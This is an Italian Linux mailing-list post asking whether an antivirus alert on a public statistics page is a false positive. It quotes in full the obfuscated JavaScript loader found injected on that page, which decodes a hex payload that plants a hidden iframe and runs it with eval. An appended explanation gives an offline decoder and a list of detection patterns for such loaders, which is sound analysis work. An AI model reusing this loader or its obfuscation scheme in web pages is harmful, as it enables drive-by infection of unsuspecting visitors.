[Linuxtrent] recovering the contents of a "compressed" javascript script?

  • From: Marco Agostini <comunelevico@xxxxxxxxx>
  • To: "linuxtrent@xxxxxxxxxxxxx" <linuxtrent@xxxxxxxxxxxxx>
  • Date: Tue, 16 Apr 2013 11:05:22 +0200

Hi, I'm not sure "compressed" is the right word.

NB: do not click on any of the links below unless you are using
Linux!

The problem is this: when visiting the site
http://www.statweb.provincia.tn.it/pubblicazioni/pop/PopTrentina2012.html
from a PC running Windows XP, the NOD32 antivirus (version 5) blocks the
page, reporting the presence of a trojan.

I had a look at the page contents (from a Linux machine) and found a
"suspicious" piece of javascript code:

<script type="text/javascript">asq=function(){return
n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(qwrbtwt){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x68,0x66,0x79,0x66,0x71,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x6d,0x70,0x64,0x62,0x6d,0x69,0x70,0x74,0x75,0x30,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x68,0x66,0x79,0x66,0x71,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x68,0x66,0x79,0x66,0x71,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x68,0x66,0x79,0x66,0x71,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x68,0x66,0x79,0x66,0x71,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c,0xe,0xb".split(",");h=2;s="";for(i=0;i-481!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;eval(""+s);}}}}</script>

NB: do not click on the link below if you do NOT have Linux!
Trying a web search for "catch(qwrbtwt)", I find several sites that
contain the script, including this one:
http://www.google.it/interstitial?url=http://www.comune.fubine.al.it/

Google blocks the link quoted above (www.comune.fubine.al.it) and flags
it like this: "Warning - visiting this site may harm your
computer!".

What I would like to understand is:
- is this a false positive?
- is it possible to "decrypt" what is contained in the javascript
script quoted above?

Thanks a lot.
--
To subscribe (or unsubscribe), just send a message with the SUBJECT
"subscribe" (or "unsubscribe") to mailto:linuxtrent-request@xxxxxxxxxxxxx
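The second question (can the payload be recovered?) can be answered without running the script. The quoted code keeps its payload as a comma-separated list of hex literals in `n="0x29,0x67,...".split(",")`, then for each entry computes `String.fromCharCode(eval(entry) - 1)` and finally `eval()`s the concatenated string. An offline decoder only needs to repeat the first two steps and never call `eval`. The block below is an added example written for this reply; it is not part of the original post or of the page it was found on. The only data taken from the post are the first nine hex entries of the payload (`PAGE_PREFIX`); `SAMPLE_PLAIN` and `SNIPPET` are constructed inputs, and the function names are this example's own.

```javascript
// Added example, not from the original post: decode the kind of
// "hex list minus one" payload quoted above without ever calling eval().

// Decode a comma-separated list of hex literals into plain text, subtracting
// `shift` from each value (the quoted script subtracts 1 before fromCharCode).
function decodeShiftedHex(list, shift = 1) {
  return list
    .split(",")
    .map((tok) => {
      const code = Number.parseInt(tok.trim(), 16);
      if (Number.isNaN(code)) throw new Error(`bad token: ${tok}`);
      return String.fromCharCode(code - shift);
    })
    .join("");
}

// Inverse transform. Used here only to build a constructed sample so the
// example runs offline; the real payload sits inside the quoted <script>.
function encodeShiftedHex(text, shift = 1) {
  return Array.from(text, (ch) =>
    "0x" + (ch.charCodeAt(0) + shift).toString(16)
  ).join(",");
}

// Patterns a reviewer would grep a page for before calling the antivirus hit
// a false positive: every one of them occurs in the quoted script.
const INDICATORS = [
  /String\.fromCharCode/,
  /eval\(/,
  /\.split\(","\)/,
  /try\s*\{[^}]*document\.body\s*=\s*~1/, // browser-detection trick used to gate the decoder
];

// Return the source of each indicator pattern that matches the script text.
function indicatorsFound(scriptText) {
  return INDICATORS.filter((re) => re.test(scriptText)).map((re) => re.source);
}

// First nine entries of the payload quoted in the post (the only page data used).
const PAGE_PREFIX = "0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f";

// Constructed, benign sample payload encoded with the same scheme.
const SAMPLE_PLAIN = "var x = document.createElement('div');";
const SAMPLE_ENCODED = encodeShiftedHex(SAMPLE_PLAIN);

// Constructed snippet made of fragments of the quoted loader, for the indicator check.
const SNIPPET =
  'ss=String.fromCharCode;try{document.body=~1}catch(qwrbtwt){}' +
  'n="0x29".split(",");s=s.concat(ss(eval(asq())-1));eval(""+s);';

console.log("encoded sample :", SAMPLE_ENCODED);
console.log("decoded sample :", decodeShiftedHex(SAMPLE_ENCODED));
console.log("page prefix    :", JSON.stringify(decodeShiftedHex(PAGE_PREFIX)));
console.log("indicators     :", indicatorsFound(SNIPPET));
```

Feeding the whole `n="..."` list from the post to `decodeShiftedHex` yields the plain-text script the loader would have passed to `eval`, which can then be read like any other source. Reading the decoded text is the safe way to answer "false positive or not": a loader that hides its real code behind a character-shift and an `eval`, and gates it with `try { document.body = ~1 }` browser-detection, has no legitimate reason to be on a statistics page, whatever the decoded payload turns out to do.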